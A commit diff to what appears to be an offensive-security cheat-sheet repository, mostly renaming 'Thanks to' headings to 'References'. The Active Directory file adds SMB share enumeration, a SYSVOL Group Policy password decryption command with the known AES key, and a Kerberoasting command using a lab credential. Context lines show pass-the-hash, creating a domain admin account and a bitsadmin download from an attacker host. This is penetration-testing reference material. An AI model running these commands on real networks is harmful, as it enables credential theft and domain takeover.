Adding references sectio

Methodology and Resources/Active Directory Attack.md

@@ -84,8 +84,8 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
-ls # list files
-cd 
+ls  # list files
+cd  # move inside a folder
 get # download files
 put # replace a file
 ```
@@ -94,6 +94,18 @@ or
 
 ```powershell
 smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
+        Sharename       Type      Comment
+        ---------       ----      -------
+        ADMIN$          Disk      Remote Admin
+        C$              Disk      Default share
+        IPC$            IPC       Remote IPC
+        NETLOGON        Disk      Logon server share
+        Replication     Disk      
+        SYSVOL          Disk      Logon server share
+        Users           Disk
+use Sharename # select a Sharename
+cd Folder     # move inside a folder
+ls            # list files
 ```
 
 Mount a share
@@ -117,7 +129,10 @@ Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter
 ```bash
 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 
-e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+e.g: 
+echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
+
+echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 ```
 
 Metasploit modules to enumerate shares and credentials
@@ -319,7 +334,7 @@ TODO
 ### Kerberoast
 
 ```powershell
-GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
+$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request-user Administrator >
 
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 
@@ -337,11 +352,6 @@ hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 
-
-- https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
-- https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
-- https://room362.com/post/2016/kerberoast-pt1/
-
 ### Pass-the-Hash
 
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
@@ -463,7 +473,7 @@ net user hacker2 hacker123 /add /Domain
 net group "Domain Admins" hacker2 /add /domain
 ```
 
-## Documentation / Thanks to
+## References
 
 * [https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html](https://chryzsh.gitbooks.io/darthsidious/content/compromising-ad.html)
 * [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa)
@@ -490,4 +500,7 @@ net group "Domain Admins" hacker2 /add /domain
 * [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/)
 * [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf)
 * [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/)
-* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/)
+* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf)
+* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
+* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/)

Methodology and Resources/Linux - Persistence.md

@@ -121,7 +121,7 @@ The following directories are temporary and usually writeable
 /dev/shm/
 ```
 
-## Thanks to
+## References
 
 * [@RandoriSec - https://twitter.com/RandoriSec/status/1036622487990284289](https://twitter.com/RandoriSec/status/1036622487990284289)
 * [https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/](https://blogs.gnome.org/muelli/2009/06/g0t-r00t-pwning-a-machine/)

Methodology and Resources/Metasploit CheatSheet.md

@@ -158,6 +158,6 @@ Add-WebTransport -Url http(s)://<host>:<port>/<luri> -RetryWait 10 -RetryTotal 3
 * MS17-10 Eternal Blue - `exploit/windows/smb/ms17_010_eternalblue`
 * MS08_67 - `exploit/windows/smb/ms08_067_netapi`
 
-## Thanks to
+## References
 
 * [Multiple transports in a meterpreter payload - ionize](https://ionize.com.au/multiple-transports-in-a-meterpreter-payload/)

Methodology and Resources/Methodology_and_enumeration.md

@@ -268,7 +268,7 @@ International test card numbers and tokens
 | 4000002460000001 | tok_fi         | Finland (FI)   | Visa           |
 | 4000002500000003 | tok_fr         | France (FR)    | Visa           |
 
-## Thanks to
+## References
 
 * [[BugBounty] Yahoo phpinfo.php disclosure - Patrik Fehrenbach](http://blog.it-securityguard.com/bugbounty-yahoo-phpinfo-php-disclosure-2/)
 * [Nmap CheatSheet - HackerTarget](https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/)

Methodology and Resources/Network Discovery.md

@@ -135,6 +135,6 @@ python2.7 ./reconnoitre.py -t 192.168.1.2-252 -o ./results/ --pingsweep --hostna
 If you have a segfault with nbtscan, read the following quote.
 > Permission is denied on the broadcast address (.0) and it segfaults on the gateway (.1) - all other addresses seem fine here.So to mitigate the problem: nbtscan 192.168.0.2-255
 
-## Thanks
+## References
 
 * [TODO](TODO)

Methodology and Resources/Network Pivoting Techniques.md

@@ -165,7 +165,7 @@ plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your loc
 | remote host 1     | `ncat -l -p 8080 < file                                                    |
 | remote host 2     | `ncat -l -p 9090 > newfile`                                                |
 
-## Thanks to
+## References
 
 * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/)
 * [Port Forwarding in Windows - Windows OS Hub](http://woshub.com/port-forwarding-in-windows/)

Methodology and Resources/Reverse Shell Cheatsheet.md

@@ -223,7 +223,7 @@ stty rows <num> columns <cols>
 !sh
 ```
 
-## Thanks to
+## References
 
 * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
 * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

Methodology and Resources/Subdomains Enumeration.md

@@ -177,7 +177,7 @@ go get github.com/Ice3man543/SubOver
 ./SubOver -l subdomains.txt
 ```
 
-## Thanks
+## References
 
 * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
 * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)

Methodology and Resources/Windows - Download and Execute.md

@@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>
 ```
 
 
-## Thanks to
+## References
 
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

Methodology and Resources/Windows - Mimikatz.md

@@ -85,7 +85,7 @@ More informations can be grabbed from the Memory with :
 
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
 
-## Thanks to
+## References
 
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)

Methodology and Resources/Windows - Persistence.md

@@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
-## Thanks to
+## References
 
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
 * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)

Methodology and Resources/Windows - Post Exploitation Koadic.md

@@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
 
-## Thanks
+## References
 
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -206,7 +206,7 @@ wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 
-## Thanks to
+## References
 
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

Methodology and Resources/Windows - Using credentials.md

@@ -137,7 +137,7 @@ PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe
 PsExec.exe  \\ordws01.cscou.lab -u CSCOU\jarrieta -p nastyCutt3r cmd.exe -s  # get System shell
 ```
 
-## Thanks
+## References
 
 - [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/)
 - [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/)